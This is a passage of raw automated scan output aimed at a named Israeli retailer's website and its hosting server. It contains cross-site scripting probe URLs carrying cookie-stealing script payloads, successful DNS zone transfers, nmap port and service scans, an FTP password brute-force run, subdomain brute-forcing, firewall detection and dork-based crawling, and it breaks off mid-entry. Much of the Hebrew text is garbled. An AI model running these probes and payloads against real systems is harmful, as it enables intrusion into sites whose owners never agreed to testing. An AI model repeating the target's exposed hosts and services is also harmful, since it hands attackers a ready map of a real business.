980+ /index.1.html/html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>: myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
981+ /index.1.html/html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
982+ OSVDB-2322: /index.1.html/gallery/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
983+ OSVDB-31694: /index.1.html/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>: YaBB is vulnerable to Cross Site Scripting (XSS) in the password field of the login page. http://www.cert.org/advisories/CA-2000-02.html.
984+ OSVDB-9231: /index.1.html/error/500error.jsp?et=1<script>alert('Vulnerable')</script>;: Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. http://www.cert.org/advisories/CA-2000-02.html.
985+ OSVDB-50619: /index.1.html/cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>: RSA ClearTrust allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
986+ OSVDB-651: /index.1.html/cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
987+ OSVDB-651: /index.1.html/cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
988+ OSVDB-27095: /index.1.html/bb000001.pl<script>alert('Vulnerable')</script>: Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
989+ OSVDB-4765: /index.1.html/apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>: Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
990+ OSVDB-2243: /index.1.html/addressbook/index.php?surname=<script>alert('Vulnerable')</script>: Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
991+ OSVDB-2243: /index.1.html/addressbook/index.php?name=<script>alert('Vulnerable')</script>: Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
992+ OSVDB-54589: /index.1.html/a.jsp/<script>alert('Vulnerable')</script>: JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. http://www.cert.org/advisories/CA-2000-02.html.
993+ OSVDB-38019: /index.1.html/?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
994+ /index.1.html/<script>alert('Vulnerable')</script>.thtml: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
995+ /index.1.html/<script>alert('Vulnerable')</script>.shtml: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
996+ /index.1.html/<script>alert('Vulnerable')</script>.jsp: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
997+ /index.1.html/<script>alert('Vulnerable')</script>.aspx: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html.
998---------------------------------------------------------------------------------------------------------------------------------------
999#######################################################################################################################################
1000dnsenum VERSION:1.2.4
1001
1002----- babylon-woodline.co.il -----
1003
1004
1005Host's addresses:
1006__________________
1007
1008babylon-woodline.co.il. 14004 IN A 62.90.134.182
1009
1010
1011Name Servers:
1012______________
1013
1014ns2.webid.co.il. 86003 IN A 212.150.246.99
1015ns1.webid.co.il. 13156 IN A 62.90.134.182
1016
1017
1018Mail (MX) Servers:
1019___________________
1020
1021mail.babylon-woodline.co.il. 14400 IN A 62.90.134.182
1022
1023
1024Trying Zone Transfers and getting Bind Versions:
1025_________________________________________________
1026
1027
1028Trying Zone Transfer for babylon-woodline.co.il on ns2.webid.co.il ...
1029babylon-woodline.co.il. 14400 IN SOA (
1030babylon-woodline.co.il. 14400 IN TXT "v=spf1
1031babylon-woodline.co.il. 14400 IN MX 10
1032babylon-woodline.co.il. 14400 IN NS ns1.webid.co.il.
1033babylon-woodline.co.il. 14400 IN NS ns2.webid.co.il.
1034babylon-woodline.co.il. 14400 IN A 62.90.134.182
1035_domainkey.babylon-woodline.co.il. 14400 IN TXT o=~
1036x._domainkey.babylon-woodline.co.il. 14400 IN TXT (
1037ftp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
1038mail.babylon-woodline.co.il. 14400 IN A 62.90.134.182
1039pop.babylon-woodline.co.il. 14400 IN A 62.90.134.182
1040smtp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
1041www.babylon-woodline.co.il. 14400 IN A 62.90.134.182
1042
1043Trying Zone Transfer for babylon-woodline.co.il on ns1.webid.co.il ...
1044babylon-woodline.co.il. 14400 IN SOA (
1045babylon-woodline.co.il. 14400 IN TXT "v=spf1
1046babylon-woodline.co.il. 14400 IN MX 10
1047babylon-woodline.co.il. 14400 IN NS ns1.webid.co.il.
1048babylon-woodline.co.il. 14400 IN NS ns2.webid.co.il.
1049babylon-woodline.co.il. 14400 IN A 62.90.134.182
1050_domainkey.babylon-woodline.co.il. 14400 IN TXT o=~
1051x._domainkey.babylon-woodline.co.il. 14400 IN TXT (
1052ftp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
1053mail.babylon-woodline.co.il. 14400 IN A 62.90.134.182
1054pop.babylon-woodline.co.il. 14400 IN A 62.90.134.182
1055smtp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
1056www.babylon-woodline.co.il. 14400 IN A 62.90.134.182
1057brute force file not specified, bay.
1058#######################################################################################################################################
1059Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
1060Nmap scan report for babylon-woodline.co.il (62.90.134.182)
1061Host is up (0.24s latency).
1062rDNS record for 62.90.134.182: server.webid.co.il
1063Not shown: 336 closed ports, 124 filtered ports
1064Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1065PORT STATE SERVICE
106621/tcp open ftp
106753/tcp open domain
106880/tcp open http
1069110/tcp open pop3
1070143/tcp open imap
1071443/tcp open https
1072465/tcp open smtps
1073587/tcp open submission
1074993/tcp open imaps
1075995/tcp open pop3s
10762000/tcp open cisco-sccp
10772222/tcp open EtherNetIP-1
10783306/tcp open mysql
10795060/tcp open sip
10808080/tcp open http-proxy
10818081/tcp open blackice-icecap
1082#######################################################################################################################################
1083Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
1084Nmap scan report for babylon-woodline.co.il (62.90.134.182)
1085Host is up (0.21s latency).
1086rDNS record for 62.90.134.182: server.webid.co.il
1087Not shown: 10 closed ports, 2 filtered ports
1088PORT STATE SERVICE
108953/udp open domain
1090#######################################################################################################################################
1091Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
1092NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
1093NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
1094NSE: [ftp-brute] passwords: Time limit 3m00s exceeded.
1095Nmap scan report for babylon-woodline.co.il (62.90.134.182)
1096Host is up (0.23s latency).
1097rDNS record for 62.90.134.182: server.webid.co.il
1098
1099PORT STATE SERVICE VERSION
110021/tcp open ftp ProFTPD
1101| ftp-brute:
1102| Accounts: No valid accounts found
1103|_ Statistics: Performed 2603 guesses in 180 seconds, average tps: 14.3
1104Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1105Device type: general purpose|firewall|storage-misc|VoIP phone
1106Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
1107OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
1108Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
1109No exact OS matches for host (test conditions non-ideal).
1110Network Distance: 17 hops
1111Service Info: OS: Unix
1112
1113TRACEROUTE (using port 21/tcp)
1114HOP RTT ADDRESS
11151 144.01 ms 10.246.200.1
11162 144.31 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
11173 171.32 ms 176.10.83.34
11184 144.07 ms sfia-b2-link.telia.net (62.115.148.144)
11195 176.24 ms 80.91.253.248
11206 177.65 ms ffm-bb3-link.telia.net (62.115.121.118)
11217 181.66 ms ffm-b1-link.telia.net (62.115.116.160)
11228 174.66 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
11239 ...
112410 229.13 ms gw2-hfa-0-2-0-2-200-gw2.fra.nv.net.il (212.143.12.13)
112511 242.53 ms 212.143.12.32
112612 245.84 ms core1-0-2-0-1-gw2.hfa.nv.net.il (212.143.7.24)
112713 243.38 ms po231.srvc3.rha.nv.net.il (212.143.201.190)
112814 236.75 ms 82.166.37.254
112915 234.25 ms 82.166.37.254
113016 235.36 ms 62-90-134-178.barak.net.il (62.90.134.178)
113117 233.88 ms server.webid.co.il (62.90.134.182)
1132#######################################################################################################################################
1133Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:25 EST
1134Nmap scan report for babylon-woodline.co.il (62.90.134.182)
1135Host is up (0.23s latency).
1136rDNS record for 62.90.134.182: server.webid.co.il
1137
1138PORT STATE SERVICE VERSION
113953/tcp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
1140|_dns-fuzz: Server didn't response to our probe, can't fuzz
1141| dns-nsec-enum:
1142|_ No NSEC records found
1143| dns-nsec3-enum:
1144|_ DNSSEC NSEC3 not supported
1145| dns-nsid:
1146|_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
1147|_dns-zone-transfer: ERROR: Script execution failed (use -d to debug)
1148Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1149Device type: general purpose|storage-misc|firewall|VoIP phone
1150Running (JUST GUESSING): Linux 2.6.X|3.X (91%), Synology DiskStation Manager 5.X (90%), WatchGuard Fireware 11.X (89%), Grandstream embedded (85%)
1151OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:watchguard:fireware:11.8 cpe:/h:grandstream:gxv3275
1152Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 2.6.39 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 3.4 (89%), WatchGuard Fireware 11.8 (89%), Linux 3.10 (88%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
1153No exact OS matches for host (test conditions non-ideal).
1154Network Distance: 16 hops
1155Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
1156
1157Host script results:
1158| dns-blacklist:
1159| SPAM
1160|_ l2.apews.org - SPAM
1161| dns-brute:
1162| DNS Brute-force hostnames:
1163| host.co.il - 148.251.90.173
1164| development.co.il - 144.76.61.240
1165| http.co.il - 212.150.243.210
1166| svn.co.il - 159.65.118.35
1167| ads.co.il - 176.31.218.147
1168| mysql.co.il - 216.239.32.21
1169| mysql.co.il - 216.239.34.21
1170| mysql.co.il - 216.239.36.21
1171| mysql.co.il - 216.239.38.21
1172| images.co.il - 162.219.30.82
1173| news.co.il - 188.166.109.104
1174| adserver.co.il - 195.128.177.33
1175| info.co.il - 104.31.92.2
1176| info.co.il - 104.31.93.2
1177| test.co.il - 127.0.0.1
1178| noc.co.il - 96.31.35.145
1179| info.co.il - 2606:4700:30::681f:5c02
1180| info.co.il - 2606:4700:30::681f:5d02
1181| internal.co.il - 185.18.205.241
1182| test1.co.il - 185.56.75.60
1183| alpha.co.il - 34.243.190.172
1184| alpha.co.il - 52.19.144.59
1185| dns.co.il - 82.80.253.15
1186| internet.co.il - 95.175.32.10
1187| ns1.co.il - 178.32.55.171
1188| intra.co.il - 62.219.78.222
1189| test2.co.il - 209.88.192.216
1190| ns2.co.il - 92.222.209.88
1191| intranet.co.il - 194.90.1.109
1192| testing.co.il - 192.117.125.106
1193| download.co.il - 148.251.90.173
1194| app.co.il - 34.242.176.33
1195| upload.co.il - 192.185.139.151
1196| ntp.co.il - 107.154.156.178
1197| ntp.co.il - 107.154.163.178
1198| apps.co.il - 176.31.218.147
1199| erp.co.il - 69.163.219.179
1200| vnc.co.il - 194.90.1.109
1201| ops.co.il - 108.167.133.37
1202| voip.co.il - 212.179.240.8
1203| auth.co.il - 146.148.67.190
1204| owa.co.il - 212.29.214.195
1205| exchange.co.il - 181.215.116.38
1206| linux.co.il - 81.218.80.235
1207| pbx.co.il - 185.18.204.26
1208| beta.co.il - 176.31.218.147
1209| local.co.il - 80.244.174.35
1210| secure.co.il - 62.219.17.162
1211| blog.co.il - 212.143.60.51
1212| log.co.il - 62.219.84.197
1213| server.co.il - 148.251.90.173
1214| shop.co.il - 188.166.109.104
1215| sip.co.il - 213.8.172.5
1216| manage.co.il - 212.199.211.142
1217| mobile.co.il - 162.144.16.99
1218| monitor.co.il - 194.90.1.109
1219| mta.co.il - 212.199.167.22
1220| web.co.il - 192.115.21.75
1221| whois.co.il - 109.74.198.188
1222| www2.co.il - 64.90.49.227
1223| sql.co.il - 192.254.237.210
1224| ssh.co.il - 81.218.229.185
1225| firewall.co.il - 62.219.67.17
1226| ssl.co.il - 82.80.253.21
1227| forum.co.il - 62.219.11.147
1228| stage.co.il - 52.58.94.54
1229| chat.co.il - 95.175.47.103
1230| ftp.co.il - 198.23.57.32
1231| citrix.co.il - 165.160.13.20
1232| citrix.co.il - 165.160.15.20
1233| cms.co.il - 194.90.203.76
1234| corp.co.il - 204.93.178.102
1235| git.co.il - 81.218.229.200
1236| crs.co.il - 136.243.93.246
1237| cvs.co.il - 194.90.8.80
1238| help.co.il - 138.201.204.221
1239| home.co.il - 35.173.175.98
1240| demo.co.il - 212.235.14.43
1241|_ dev.co.il - 80.179.11.157
1242
1243TRACEROUTE (using port 53/tcp)
1244HOP RTT ADDRESS
12451 143.53 ms 10.246.200.1
12462 143.88 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
12473 153.87 ms 176.10.83.34
12484 143.59 ms sfia-b2-link.telia.net (62.115.148.144)
12495 177.61 ms 213.155.133.212
12506 175.83 ms ffm-bb3-link.telia.net (62.115.121.118)
12517 209.91 ms ffm-b1-link.telia.net (62.115.121.5)
12528 176.67 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
12539 ...
125410 228.81 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
125511 229.37 ms 212.143.7.102
125612 229.75 ms core2-rha-2-0-0-core2-hfa-5-0-7.nv.net.il (212.143.12.119)
125713 230.26 ms core1-rha-1-0-0-core1-hfa-5-0-7.nv.net.il (212.143.12.117)
125814 235.22 ms 212.143.201.190
125915 235.61 ms 62-90-134-178.barak.net.il (62.90.134.178)
126016 235.60 ms server.webid.co.il (62.90.134.182)
1261#######################################################################################################################################
1262
1263 ^ ^
1264 _ __ _ ____ _ __ _ _ ____
1265 ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1266 | V V // o // _/ | V V // 0 // 0 // _/
1267 |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1268 <
1269 ...'
1270
1271 WAFW00F - Web Application Firewall Detection Tool
1272
1273 By Sandro Gauci && Wendel G. Henrique
1274
1275Checking http://babylon-woodline.co.il
1276The site http://babylon-woodline.co.il is behind a ModSecurity (OWASP CRS)
1277Number of requests: 13
1278#######################################################################################################################################
1279http://babylon-woodline.co.il [301 Moved Permanently] Country[ISRAEL][IL], HTTPServer[nginx], IP[62.90.134.182], RedirectLocation[/index.1.html], nginx
1280http://babylon-woodline.co.il/index.1.html [200 OK] Country[ISRAEL][IL], HTML5, HTTPServer[nginx], IP[62.90.134.182], JQuery, Meta-Author[ישר×ל ממליץ], Open-Graph-Protocol, Script[text/javascript], Title[×ž×–×¨×•× ×™× ×œ×™×™×Ÿ], nginx
1281#######################################################################################################################################
1282wig - WebApp Information Gatherer
1283
1284
1285Scanning http://babylon-woodline.co.il...
1286_________________________________________ SITE INFO __________________________________________
1287IP Title
128862.90.134.182 ×ž×–×¨×•× ×™× ×œ×™×™×Ÿ
1289
1290__________________________________________ VERSION ___________________________________________
1291Name Versions Type
1292Roundcube CMS
1293phpMyAdmin CMS
1294Apache 2.4.10 | 2.4.11 | 2.4.12 | 2.4.5 | 2.4.6 | 2.4.7 | 2.4.8 Platform
1295 2.4.9
1296nginx Platform
1297
1298______________________________________________________________________________________________
1299Time: 111.5 sec Urls: 472 Fingerprints: 40401
1300#######################################################################################################################################
1301HTTP/1.1 301 Moved Permanently
1302Server: nginx
1303Date: Wed, 23 Jan 2019 09:30:32 GMT
1304Content-Type: text/html; charset=utf-8
1305Connection: keep-alive
1306Location: /index.1.html
1307Vary: User-Agent
1308#######################################################################################################################################
1309---------------------------------------------------------------------------------------------------------------------------------------
1310
1311[ ! ] Starting SCANNER INURLBR 2.1 at [23-01-2019 04:30:53]
1312[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
1313It is the end user's responsibility to obey all applicable local, state and federal laws.
1314Developers assume no liability and are not responsible for any misuse or damage caused by this program
1315
1316[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-babylon-woodline.co.il ]
1317[ INFO ][ DORK ]::[ site:babylon-woodline.co.il ]
1318[ INFO ][ SEARCHING ]:: {
1319[ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.tr ]
1320
1321[ INFO ][ SEARCHING ]::
1322-[:::]
1323[ INFO ][ ENGINE ]::[ GOOGLE API ]
1324
1325[ INFO ][ SEARCHING ]::
1326-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1327[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.mt ID: 012873187529719969291:yexdhbzntue ]
1328
1329[ INFO ][ SEARCHING ]::
1330-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1331
1332[ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
1333
1334
1335 _[ - ]::--------------------------------------------------------------------------------------------------------------
1336|_[ + ] [ 0 / 100 ]-[04:31:14] [ - ]
1337|_[ + ] Target:: [ http://babylon-woodline.co.il/מזרון-ב××™×ª× ×™× ]
1338|_[ + ] Exploit::
1339|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1340|_[ + ] More details:: / - / , ISP:
1341|_[ + ] Found:: UNIDENTIFIED
1342
1343 _[ - ]::--------------------------------------------------------------------------------------------------------------
1344|_[ + ] [ 1 / 100 ]-[04:31:16] [ - ]
1345|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-במבצע-ב×לר×× ]
1346|_[ + ] Exploit::
1347|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1348|_[ + ] More details:: / - / , ISP:
1349|_[ + ] Found:: UNIDENTIFIED
1350
1351 _[ - ]::--------------------------------------------------------------------------------------------------------------
1352|_[ + ] [ 2 / 100 ]-[04:31:18] [ - ]
1353|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨× ×™×-זולי×-כרמיה ]
1354|_[ + ] Exploit::
1355|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1356|_[ + ] More details:: / - / , ISP:
1357|_[ + ] Found:: UNIDENTIFIED
1358
1359 _[ - ]::--------------------------------------------------------------------------------------------------------------
1360|_[ + ] [ 3 / 100 ]-[04:31:20] [ - ]
1361|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-×§×˜× ×™×-ביובל ]
1362|_[ + ] Exploit::
1363|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1364|_[ + ] More details:: / - / , ISP:
1365|_[ + ] Found:: UNIDENTIFIED
1366
1367 _[ - ]::--------------------------------------------------------------------------------------------------------------
1368|_[ + ] [ 4 / 100 ]-[04:31:23] [ - ]
1369|_[ + ] Target:: [ http://babylon-woodline.co.il/×—× ×•×ª-×ž×–×¨× ×™×-בפת ]
1370|_[ + ] Exploit::
1371|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1372|_[ + ] More details:: / - / , ISP:
1373|_[ + ] Found:: UNIDENTIFIED
1374
1375 _[ - ]::--------------------------------------------------------------------------------------------------------------
1376|_[ + ] [ 5 / 100 ]-[04:31:25] [ - ]
1377|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨× ×™×-בזול-×רי×ל ]
1378|_[ + ] Exploit::
1379|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1380|_[ + ] More details:: / - / , ISP:
1381|_[ + ] Found:: UNIDENTIFIED
1382
1383 _[ - ]::--------------------------------------------------------------------------------------------------------------
1384|_[ + ] [ 6 / 100 ]-[04:31:27] [ - ]
1385|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-רשפון ]
1386|_[ + ] Exploit::
1387|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1388|_[ + ] More details:: / - / , ISP:
1389|_[ + ] Found:: UNIDENTIFIED
1390
1391 _[ - ]::--------------------------------------------------------------------------------------------------------------
1392|_[ + ] [ 7 / 100 ]-[04:31:29] [ - ]
1393|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-× ×•×—×™×-בשמעה ]
1394|_[ + ] Exploit::
1395|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1396|_[ + ] More details:: / - / , ISP:
1397|_[ + ] Found:: UNIDENTIFIED
1398
1399 _[ - ]::--------------------------------------------------------------------------------------------------------------
1400|_[ + ] [ 8 / 100 ]-[04:31:32] [ - ]
1401|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-גבוהי×-×‘×™×›×™× ×™ ]
1402|_[ + ] Exploit::
1403|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1404|_[ + ] More details:: / - / , ISP:
1405|_[ + ] Found:: UNIDENTIFIED
1406
1407 _[ - ]::--------------------------------------------------------------------------------------------------------------
1408|_[ + ] [ 9 / 100 ]-[04:31:34] [ - ]
1409|_[ + ] Target:: [ http://babylon-woodline.co.il/מזרון-בזול-שבלי ]
1410|_[ + ] Exploit::
1411|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1412|_[ + ] More details:: / - / , ISP:
1413|_[ + ] Found:: UNIDENTIFIED
1414
1415 _[ - ]::--------------------------------------------------------------------------------------------------------------
1416|_[ + ] [ 10 / 100 ]-[04:31:36] [ - ]
1417|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-×‘× ×©×¨ ]
1418|_[ + ] Exploit::
1419|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1420|_[ + ] More details:: / - / , ISP:
1421|_[ + ] Found:: UNIDENTIFIED
1422
1423 _[ - ]::--------------------------------------------------------------------------------------------------------------
1424|_[ + ] [ 11 / 100 ]-[04:31:38] [ - ]
1425|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-חדרה ]
1426|_[ + ] Exploit::
1427|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1428|_[ + ] More details:: / - / , ISP:
1429|_[ + ] Found:: UNIDENTIFIED
1430
1431 _[ - ]::--------------------------------------------------------------------------------------------------------------
1432|_[ + ] [ 12 / 100 ]-[04:31:41] [ - ]
1433|_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרון-בגבת ]
1434|_[ + ] Exploit::
1435|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1436|_[ + ] More details:: / - / , ISP:
1437|_[ + ] Found:: UNIDENTIFIED
1438
1439 _[ - ]::--------------------------------------------------------------------------------------------------------------
1440|_[ + ] [ 13 / 100 ]-[04:31:43] [ - ]
1441|_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרן-×‘×ž× ×•×£ ]
1442|_[ + ] Exploit::
1443|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1444|_[ + ] More details:: / - / , ISP:
1445|_[ + ] Found:: UNIDENTIFIED
1446
1447 _[ - ]::--------------------------------------------------------------------------------------------------------------
1448|_[ + ] [ 14 / 100 ]-[04:31:45] [ - ]
1449|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-×¡×›× ×™×Ÿ ]
1450|_[ + ] Exploit::
1451|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1452|_[ + ] More details:: / - / , ISP:
1453|_[ + ] Found:: UNIDENTIFIED
1454
1455 _[ - ]::--------------------------------------------------------------------------------------------------------------
1456|_[ + ] [ 15 / 100 ]-[04:31:48] [ - ]
1457|_[ + ] Target:: [ http://babylon-woodline.co.il/×—× ×•×ª-×ž×–×¨× ×™×-×©×¨×•× ×” ]
1458|_[ + ] Exploit::
1459|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1460|_[ + ] More details:: / - / , ISP:
1461|_[ + ] Found:: UNIDENTIFIED
1462
1463 _[ - ]::--------------------------------------------------------------------------------------------------------------
1464|_[ + ] [ 16 / 100 ]-[04:31:50] [ - ]
1465|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-× ×•×—×™×-בשעב ]
1466|_[ + ] Exploit::
1467|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1468|_[ + ] More details:: / - / , ISP:
1469|_[ + ] Found:: UNIDENTIFIED
1470
1471 _[ - ]::--------------------------------------------------------------------------------------------------------------
1472|_[ + ] [ 17 / 100 ]-[04:31:52] [ - ]
1473|_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרן-במסד ]
1474|_[ + ] Exploit::
1475|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1476|_[ + ] More details:: / - / , ISP:
1477|_[ + ] Found:: UNIDENTIFIED
1478
1479 _[ - ]::--------------------------------------------------------------------------------------------------------------
1480|_[ + ] [ 18 / 100 ]-[04:31:55] [ - ]
1481|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-×™×–×¨×¢× ]
1482|_[ + ] Exploit::
1483|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1484|_[ + ] More details:: / - / , ISP:
1485|_[ + ] Found:: UNIDENTIFIED
1486
1487 _[ - ]::--------------------------------------------------------------------------------------------------------------
1488|_[ + ] [ 19 / 100 ]-[04:31:57] [ - ]
1489|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-× ×•×—×™×-×‘×’× ×•×ª ]
1490|_[ + ] Exploit::
1491|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1492|_[ + ] More details:: / - / , ISP:
1493|_[ + ] Found:: UNIDENTIFIED
1494
1495 _[ - ]::--------------------------------------------------------------------------------------------------------------
1496|_[ + ] [ 20 / 100 ]-[04:31:59] [ - ]
1497|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-עודפי×-בדור ]
1498|_[ + ] Exploit::
1499|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1500|_[ + ] More details:: / - / , ISP:
1501|_[ + ] Found:: UNIDENTIFIED
1502
1503 _[ - ]::--------------------------------------------------------------------------------------------------------------
1504|_[ + ] [ 21 / 100 ]-[04:32:01] [ - ]
1505|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨× ×™×-בזול-מיצר ]
1506|_[ + ] Exploit::
1507|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1508|_[ + ] More details:: / - / , ISP:
1509|_[ + ] Found:: UNIDENTIFIED
1510
1511 _[ - ]::--------------------------------------------------------------------------------------------------------------
1512|_[ + ] [ 22 / 100 ]-[04:32:03] [ - ]
